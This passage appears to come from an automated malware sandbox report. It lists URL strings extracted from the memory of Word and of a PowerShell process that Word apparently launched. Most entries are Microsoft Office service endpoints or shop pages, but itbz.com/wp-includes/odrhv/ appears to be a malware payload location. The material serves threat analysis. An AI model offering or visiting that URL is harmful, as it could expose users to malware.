Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-note-7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s6-edge-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s6-edge-samsung/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s7-edge/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s8-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s9-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-s9/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxya3/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxya5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxya7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxyace3/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxyalpha/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxygrand2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxynote2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxynote3/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxynote4/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys3/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys3mini/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys4/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys4mini/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxys6/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/grand-prime-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/grandprime/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/honor-10/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/honor-7x/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/honor-8x-max/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/honor-8x/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/honor-9-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/huawei
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/huawei-honor-p8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/huawei-p9-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/huawei-y6-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-10-2-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-9-7-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-9-7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-mini-4/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-pro-10-5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-pro-12-7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad-pro-12-9-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipad2-3-4/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipadair/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipadair2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipadmini/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipadmini2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-7-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-xi-11-5-8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-xi-11-6-1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-xi-11-6-5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-xr/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone-xs-max/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone4-4s/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone5-5s/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone5c/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone6/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/iphone6plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ipodtouch5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j2-core/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j2-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j4-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j4-plus-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j5-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j6-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j6-plus-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j7-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/j8-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-10-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-10-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-10/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-20-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-20-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-20-x/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-30-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-30-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mate-30/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mi-a1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mi-mix-2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/mi-mix-2s/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/nokia-3-1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/nokia-3/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2198755822.0000000000BA2000.00000004.00000001.sdmpString found in binary or memory: https://directory.services.
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/t
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comen
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android)
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Droid
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://fs.micL
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester(~0
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterxhl
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.1935646891.000001BA0A441000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://graph.mic
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://graph.microsofs
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1763302965.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/k
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/e
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/k
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net0
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryatOfficeOnlineContenthttps://insertmedi
Source: WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryh
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?M
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ds
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?3
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentImageshttps://hubbl
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.comdUIs(l
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comeRlIx%
Source: WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing48
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtngssNLb
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookr
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivesXls
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTssl.
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://itbz.com/wp-includes/odrhv/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: https://itbz.com/wp-includes/odrhv/xhl
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comk
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/
Source: WINWORD.EXE, 00000000.00000003.1763236843.000000000C7BB000.00000004.00000001.sdmpString found in binary or memory: https://login.windowa
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize1L
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize2
Source: WINWORD.EXE, 00000000.00000003.1763302965.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localace
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.ne
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/c
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauh
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0Z
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0b
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize123s
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1re~
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1xt
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3WMUR
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH1
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOfCi
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeabled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeal
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeash
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeate
